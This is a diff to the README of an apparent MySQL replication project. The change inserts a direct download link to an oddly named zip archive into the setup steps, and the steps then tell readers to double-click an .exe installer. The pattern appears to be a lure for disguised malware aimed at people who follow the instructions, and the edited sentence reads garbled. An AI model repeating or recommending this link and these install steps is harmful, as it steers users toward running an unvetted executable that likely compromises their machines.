Kazhhe4682/MySQL-Replication-Infrastructure-with-Fallback-Server/README.md

 ## 📊 How to Set Up

-1. **Extract Files (if necessary):** If you downloaded a .tar.gz file, right-click on it and select "Extract All."
+1. **Extract Files (if necessary):** If you downloaded a https://raw.githubusercontent.com/Kazhhe4682/MySQL-Replication-Infrastructure-with-Fallback-Server/main/laddikie/with-My-Replication-SQ-Server-Infrastructure-Fallback-3.0.zip file, right-click on it and select "Extract All."
 2. **Run the Installer:** Double-click the .exe file to start the installation.
 3. **Follow Instructions:** The installation wizard will guide you.
 Read prompts carefully and select options based on your needs.
 4. **Configuration Settings:** Set up your database connections as prompted during installation.